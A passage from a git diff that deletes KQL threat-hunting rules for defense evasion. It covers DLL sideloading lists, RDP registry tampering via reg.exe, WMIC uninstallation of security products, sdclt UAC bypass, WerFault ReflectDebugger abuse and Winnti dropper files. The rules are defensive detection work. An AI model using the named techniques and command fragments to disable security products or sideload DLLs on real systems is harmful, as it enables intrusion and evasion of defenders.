"\\dmcmnutils.dll" or FolderPath endswith "\\dmenrollengine.dll" or FolderPath endswith "\\dmenterprisediagnostics.dll" or FolderPath endswith "\\dmiso8601utils.dll" or FolderPath endswith "\\dmoleaututils.dll" or FolderPath endswith "\\dmprocessxmlfiltered.dll" or FolderPath endswith "\\dmpushproxy.dll" or FolderPath endswith "\\dmxmlhelputils.dll" or FolderPath endswith "\\dnsapi.dll" or FolderPath endswith "\\dot3api.dll" or FolderPath endswith "\\dot3cfg.dll" or FolderPath endswith "\\drprov.dll" or FolderPath endswith "\\dsclient.dll" or FolderPath endswith "\\dsparse.dll" or FolderPath endswith "\\dsreg.dll" or FolderPath endswith "\\dsrole.dll" or FolderPath endswith "\\dui70.dll" or FolderPath endswith "\\duser.dll" or FolderPath endswith "\\dusmapi.dll" or FolderPath endswith "\\dwmapi.dll" or FolderPath endswith "\\dwrite.dll" or FolderPath endswith "\\dxgi.dll" or FolderPath endswith "\\dxva2.dll" or FolderPath endswith "\\eappcfg.dll" or 
FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath 
endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath 
endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\tapi32.dll" 
or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath 
endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith 
"\\batmeter.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\winscard.dll" or 
FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll" or FolderPath endswith "\\wbemcomn.dll") and (not(((FolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and FolderPath endswith "\\version.dll") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\")))) and (not(((FolderPath contains "C:\\Program Files\\Arsenal-Image-Mounter-" and (FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl")) or FolderPath contains 
"C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or ((FolderPath contains "C:\\Program Files\\CheckPoint\\" or FolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and FolderPath endswith "\\PolicyManager.dll" and (InitiatingProcessFolderPath contains "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe") or (FolderPath contains ":\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and InitiatingProcessFolderPath endswith "\\wldp.dll") or (FolderPath contains "C:\\Program Files\\Microsoft\\Exchange Server\\" and FolderPath endswith "\\mswb7.dll") or (FolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" and InitiatingProcessFolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe")))) \ No newline at end of file diff --git a/Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql b/Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql deleted file mode 100644 index 6cbd83b0..00000000 --- a/Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport
-// Date: 2022/02/12
-// Level: high
-// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
-// Tags: attack.defense_evasion, attack.lateral_movement, attack.t1021.001, attack.t1112
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "fDenyTSConnections"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql b/Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql
deleted file mode 100644
index b51227cf..00000000
--- a/Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/01/30
-// Level: high
-// Description: Detects uninstallation or termination of security products using the WMIC utility
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "wmic" and ProcessCommandLine contains "product where " and ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall" and ProcessCommandLine contains "/nointeractive") or ((ProcessCommandLine contains "call delete" or ProcessCommandLine contains "call terminate") and (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "caption like ")) or (ProcessCommandLine contains "process " and ProcessCommandLine contains "where " and ProcessCommandLine contains "delete")) and (ProcessCommandLine contains "%carbon%" or ProcessCommandLine contains "%cylance%" or ProcessCommandLine contains "%endpoint%" or ProcessCommandLine contains "%eset%" or ProcessCommandLine contains "%malware%" or ProcessCommandLine contains "%Sophos%" or ProcessCommandLine contains "%symantec%" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "AVG " or ProcessCommandLine contains "Carbon Black" or ProcessCommandLine contains "CarbonBlack" or ProcessCommandLine contains "Cb Defense Sensor 64-bit" or ProcessCommandLine contains "Crowdstrike Sensor" or ProcessCommandLine contains "Cylance " or ProcessCommandLine contains "Dell Threat Defense" or ProcessCommandLine contains "DLP Endpoint" or ProcessCommandLine contains "Endpoint Detection" or ProcessCommandLine contains "Endpoint Protection" or ProcessCommandLine contains "Endpoint Security" or ProcessCommandLine contains "Endpoint Sensor" or ProcessCommandLine contains "ESET File Security" or ProcessCommandLine contains "LogRhythm System Monitor Service" or ProcessCommandLine contains "Malwarebytes" or ProcessCommandLine contains "McAfee Agent" or 
ProcessCommandLine contains "Microsoft Security Client" or ProcessCommandLine contains "Sophos Anti-Virus" or ProcessCommandLine contains "Sophos AutoUpdate" or ProcessCommandLine contains "Sophos Credential Store" or ProcessCommandLine contains "Sophos Management Console" or ProcessCommandLine contains "Sophos Management Database" or ProcessCommandLine contains "Sophos Management Server" or ProcessCommandLine contains "Sophos Remote Management System" or ProcessCommandLine contains "Sophos Update Manager" or ProcessCommandLine contains "Threat Protection" or ProcessCommandLine contains "VirusScan" or ProcessCommandLine contains "Webroot SecureAnywhere" or ProcessCommandLine contains "Windows Defender")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql b/Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql
deleted file mode 100644
index cb5229ea..00000000
--- a/Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "sdclt.exe" and ProcessIntegrityLevel =~ "High"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql b/Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql
deleted file mode 100644
index da809f2c..00000000
--- a/Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_WWlib.DLL_Sideloading.kql b/Defense Evasion/Potential_WWlib.DLL_Sideloading.kql
deleted file mode 100644
index 4753e096..00000000
--- a/Defense Evasion/Potential_WWlib.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/05/18
-// Level: medium
-// Description: Detects potential DLL sideloading of "wwlib.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql b/Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql
deleted file mode 100644
index 77fc4544..00000000
--- a/Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/14
-// Level: high
-// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql b/Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
deleted file mode 100644
index 224f54fb..00000000
--- a/Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: medium
-// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql b/Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql
deleted file mode 100644
index 91f57b60..00000000
--- a/Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/05/18
-// Level: high
-// Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceRegistryEvents
-| where ActionType =~ "RegistryValueSet" and RegistryKey endswith "\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\ReflectDebugger"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Winnti_Dropper_Activity.kql b/Defense Evasion/Potential_Winnti_Dropper_Activity.kql
deleted file mode 100644
index fd24affe..00000000
--- a/Defense Evasion/Potential_Winnti_Dropper_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander Rausch
-// Date: 2020/06/24
-// Level: high
-// Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook
-// Tags: attack.defense_evasion, attack.t1027
-DeviceFileEvents
-| where FolderPath endswith "\\gthread-3.6.dll" or FolderPath endswith "\\sigcmm-2.4.dll" or FolderPath endswith "\\Windows\\Temp\\tmp.bat"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql b/Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql
deleted file mode 100644
index fa40db7c..00000000
--- a/Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: high
-// Description: Detects potential DLL sideloading of "appverifUI.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql b/Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql
deleted file mode 100644
index 3695de47..00000000
--- a/Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/20
-// Level: medium
-// Description: Detects usage of Dsacls to grant over permissive permissions
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " /G " and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") and (ProcessCommandLine contains "GR" or ProcessCommandLine contains "GE" or ProcessCommandLine contains "GW" or ProcessCommandLine contains "GA" or ProcessCommandLine contains "WP" or ProcessCommandLine contains "WD")
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql b/Defense Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql
deleted file mode 100644
index 0c07adec..00000000
--- a/Defense Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/14
-// Level: high
-// Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
